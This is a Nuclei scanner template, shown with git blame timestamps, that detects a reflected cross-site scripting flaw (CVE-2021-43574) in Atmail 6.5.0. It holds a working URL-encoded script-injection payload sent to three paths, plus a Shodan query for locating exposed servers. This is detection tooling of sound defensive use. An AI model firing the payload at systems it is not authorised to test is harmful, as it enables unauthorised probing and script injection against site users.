nuclei-templates/http/cves/2021/CVE-2021-43574.yaml

50 lines
1.5 KiB
YAML
Raw Normal View History

2022-09-01 06:16:54 +00:00
id: CVE-2021-43574
info:
name: Atmail 6.5.0 - Cross-Site Scripting
2022-09-01 06:34:48 +00:00
author: arafatansari,ritikchaddha
severity: medium
2022-09-01 06:16:54 +00:00
description: |
Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter.
2022-09-01 06:16:54 +00:00
reference:
- https://medium.com/@bhattronit96/cve-2021-43574-696041dcab9e
- https://help.atmail.com/hc/en-us/sections/115003283988
- https://nvd.nist.gov/vuln/detail/CVE-2021-43574
2022-09-01 06:34:48 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-43574
cwe-id: CWE-79
2022-09-01 06:16:54 +00:00
metadata:
2022-09-01 06:34:48 +00:00
shodan-query: http.html:"Powered by Atmail"
verified: "true"
2022-09-01 06:34:48 +00:00
tags: cve,cve2021,atmail,xss
2022-09-01 06:16:54 +00:00
http:
2022-09-01 06:34:48 +00:00
- method: GET
path:
- "{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-09-01 06:16:54 +00:00
2022-09-01 06:34:48 +00:00
stop-at-first-match: true
2022-09-01 06:16:54 +00:00
matchers-condition: and
matchers:
2022-09-01 06:34:48 +00:00
- type: word
part: body
words:
- '<script>alert(document.domain)</script>" does not exist'
2022-09-01 06:16:54 +00:00
- type: word
2022-09-01 06:34:48 +00:00
part: header
2022-09-01 06:16:54 +00:00
words:
2022-09-01 06:34:48 +00:00
- text/html
- type: status
status:
- 500
- 403
condition: or
# Enhanced by md on 2022/09/08